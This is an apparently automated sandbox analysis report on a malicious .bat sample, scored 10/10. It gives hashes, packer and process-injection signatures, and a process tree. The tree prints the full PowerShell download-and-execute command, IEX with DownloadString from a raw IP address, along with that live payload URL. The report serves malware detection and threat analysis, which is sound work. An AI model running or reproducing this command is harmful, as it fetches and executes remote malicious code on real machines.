Analysis
- max time kernel: 66s
- max time network: 94s
- platform: windows10_x64
- resource: win10v200722
- submitted: 05-08-2020 09:10
Static task: static1

Behavioral task: behavioral1
- Sample: 06b926501124d92a036344bf241649d7.bat
- Resource: win7v200722 (windows7_x64)
- 0 signatures, 0 seconds

Behavioral task: behavioral2
- Sample: 06b926501124d92a036344bf241649d7.bat
- Resource: win10v200722 (windows10_x64)
- 0 signatures, 0 seconds
General
- Target: 06b926501124d92a036344bf241649d7.bat
- Size: 220B
- MD5: 1f1b4ef469c59f64bc350fa3049fb232
- SHA1: 3415fe4896d99fe99f439347fdb4aa3fc2ce9358
- SHA256: b90e099ce246bbb92781c5426491b3def2122660c546f5ab93aca4a0baeb1edd
- SHA512: 93cf23a75fd96010e5ce84107ab0a86013775aa6392c1218611b7538c9abf2700a13998325993cc3ae1c95d23a680df37b70cc2b245c04fd5aa14bf185696399
- Score: 10/10
Malware Config
Extracted
- Language: ps1
- Source: ps1.dropper
- URLs: http://185.103.242.78/pastes/06b926501124d92a036344bf241649d7
Signatures

- Suspicious behavior: EnumeratesProcesses (13 IoCs)
  Processes:
    pid   process
    608   WerFault.exe   (13 identical entries)

- ServiceHost packer (6 IoCs)
  Detects ServiceHost packer used for .NET malware
  Processes:
    resource                                                  yara_rule
    behavioral2/memory/576-2-0x0000000000000000-mapping.dmp   servicehost
    behavioral2/memory/576-3-0x0000000000000000-mapping.dmp   servicehost
    behavioral2/memory/576-4-0x0000000000000000-mapping.dmp   servicehost
    behavioral2/memory/576-5-0x0000000000000000-mapping.dmp   servicehost
    behavioral2/memory/576-6-0x0000000000000000-mapping.dmp   servicehost
    behavioral2/memory/576-7-0x0000000000000000-mapping.dmp   servicehost

- Suspicious use of WriteProcessMemory (3 IoCs)
  Processes:
    description                      pid   process   target process
    PID 60 wrote to memory of 576    60    cmd.exe   powershell.exe   (3 identical entries)

- Program crash (1 IoC)
  Processes:
    pid   pid_target   process        target process
    608   576          WerFault.exe   powershell.exe

- Suspicious use of AdjustPrivilegeToken (3 IoCs)
  Processes:
    description                 pid   process
    Token: SeRestorePrivilege   608   WerFault.exe
    Token: SeBackupPrivilege    608   WerFault.exe
    Token: SeDebugPrivilege     608   WerFault.exe
Processes

- C:\Windows\system32\cmd.exe (PID 60)
  Command line: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\06b926501124d92a036344bf241649d7.bat"
  - Suspicious use of WriteProcessMemory

  - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 576)
    Command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/06b926501124d92a036344bf241649d7');Invoke-HIUNLHOBGPFML;Start-Sleep -s 10000"

    - C:\Windows\SysWOW64\WerFault.exe (PID 608)
      Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 576 -s 704
      - Suspicious behavior: EnumeratesProcesses
      - Program crash
      - Suspicious use of AdjustPrivilegeToken